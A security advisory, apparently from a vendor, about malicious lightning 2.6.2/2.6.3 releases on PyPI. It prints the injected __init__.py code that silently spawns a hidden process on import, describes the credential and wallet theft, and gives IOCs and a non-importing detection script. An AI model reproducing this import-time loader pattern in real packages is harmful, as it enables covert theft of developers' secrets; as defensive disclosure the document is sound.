The Mini Shai-Hulud supply chain campaign has spread to PyPI. Versions 2.6.2 and 2.6.3 of the popular lightning Python package, used widely for training PyTorch models, contain malicious code that silently exfiltrates developer credentials, cloud secrets, and cryptocurrency wallets.
This comes after two recent attacks in the same campaign: the Bitwarden CLI npm compromise and the SAP npm compromise. The same attacker, same worm, now crossing from npm to PyPI.
If you are using lightning==2.6.2 or lightning==2.6.3, treat your machine as compromised.
How it works
The attack is injected directly into __init__.py, the file that runs the moment you import the package. A background thread is spawned before any legitimate Lightning code loads:

import os
import subprocess
import sys
import threading

def _run_runtime() -> None:
    # Locate the dropped _runtime/start.py next to the package's own files.
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        # Detached child with stdout/stderr discarded, so nothing appears in the console.
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()

It executes start.py, a cross-platform Bun bootstrapper that detects your OS and architecture, downloads the Bun JavaScript runtime v1.3.13, and executes router_runtime.js, the main 11 MB payload. This is the same pattern used in the recent Bitwarden and SAP attacks.
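Because the payload fires on import, any check for the compromised release must inspect the installed files without importing lightning. The following script is an added example (not Aikido's tooling): it locates the package through pip metadata only, flags the affected versions, and compares any _runtime/start.py or router_runtime.js against the SHA256 indicators listed in this post.

```python
"""Check an environment for the compromised lightning releases without
importing the package (importing it is what launches the payload)."""
import hashlib
import importlib.metadata
from pathlib import Path

# Indicators taken from the advisory above.
MALICIOUS_VERSIONS = {"2.6.2", "2.6.3"}
KNOWN_BAD_SHA256 = {
    "router_runtime.js": "5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1",
    "start.py": "8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2",
}

def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def check_lightning_install(package_dir: str, version: str) -> list[str]:
    """Return findings for one installed copy of lightning.
    package_dir: the directory holding lightning/__init__.py; version: installed version."""
    findings = []
    if version in MALICIOUS_VERSIONS:
        findings.append(f"version {version} is a known-malicious release")
    runtime_dir = Path(package_dir) / "_runtime"
    if runtime_dir.is_dir():
        # A legitimate lightning install does not ship a _runtime/ directory.
        findings.append("unexpected _runtime/ directory present")
        for name, bad in KNOWN_BAD_SHA256.items():
            path = runtime_dir / name
            if path.is_file() and sha256_bytes(path.read_bytes()) == bad:
                findings.append(f"{name} matches known-bad SHA256")
    return findings

def scan_environment() -> list[str]:
    """Locate lightning via distribution metadata only; never import it."""
    try:
        dist = importlib.metadata.distribution("lightning")
    except importlib.metadata.PackageNotFoundError:
        return []
    package_dir = dist.locate_file("lightning")
    return check_lightning_install(str(package_dir), dist.version)

if __name__ == "__main__":
    hits = scan_environment()
    print("\n".join(hits) if hits else "no indicators found")
```

Run it with the interpreter of each virtualenv or CI image you want to check; a hash match on start.py or router_runtime.js confirms the dropped files are present, and the version check alone is enough to treat the host as compromised.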
What it steals
SSH keys, shell histories (bash, zsh, Python, Node, MySQL, psql), .env files, git credentials, AWS/GCP/Azure credentials, Kubernetes and Helm configs, Docker credentials, npm tokens, and MCP configs. Cryptocurrency wallets including Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic and Ledger. VPN credentials for NordVPN, ProtonVPN, CyberGhost, Windscribe and OpenVPN. Discord and Slack session data.
All stolen data is RSA-2048 encrypted before being exfiltrated to public GitHub repositories.
How Aikido detects this
If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.
If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.
For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.
For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.
IOCs
- Package: lightning==2.6.2, lightning==2.6.3
- router_runtime.js SHA256: 5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
- start.py SHA256: 8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2